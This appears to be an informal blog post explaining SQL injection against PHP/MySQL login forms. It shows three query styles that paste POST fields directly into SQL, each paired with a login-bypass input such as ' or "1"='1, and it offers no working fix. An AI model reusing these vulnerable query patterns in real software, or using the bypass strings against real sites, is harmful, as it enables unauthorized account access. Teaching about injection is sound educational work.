This is the blog to share your views and ideas and opinions of diffrent type of people, on our politics, media movies on each and every thing....

don't forget to comment.....!

sql injection in php mysql

Now a days we are creating the dynamic  websites using php and mysql ,
because of less cost and more safety..
in every dynamic website, we see the login page in order to login, here we have small problems,
the problems, the people who is having the knowledge of programming, they can play some tricks
inorder to login to your account, using small tricks,
i'm going to explain with the example...
if the query is like the following , in the backend i.e

$qw="select * from tbl_admin where user_name=$_POST[username] and
upassword=$_POST[password]";

select * from tbl_admin where user_name="" or "1"="1" and upassword="" or "1"="1"

username :  "" or "1"="1"
password :  "" or "1"="1"

-----------------------------------------------------------------------------------
$qw="select * from tbl_admin where user_name='$_POST[username]' and upassword='$_POST[password]'";

select * from tbl_admin where user_name=' ' or "1"='1' and upassword=' ' or "1"='1'
username :  ' or "1"='1
password : ' or "1"='1
-------------------------------------------------------------------------------------------------------------------------------------------------------------
$qw='select * from tbl_admin where user_name="'.$_POST[username].'" and upassword="'.$_POST[password].'"';

select * from tbl_admin where user_name="" OR ""="" and upassword="" OR ""=""

username :  " OR ""="
password :  " OR ""="

select * from tbl_admin where user_name="" or "1"="1" and upassword="" or "1"="1"

username :  " or "1"="1
password :  " or "1"="1
------------------------------------------------------------------------------------------

Inorder to avoid those we will write the query in good passion...

0 comments:

Post a Comment

 
Bookmark and Share blogarama.com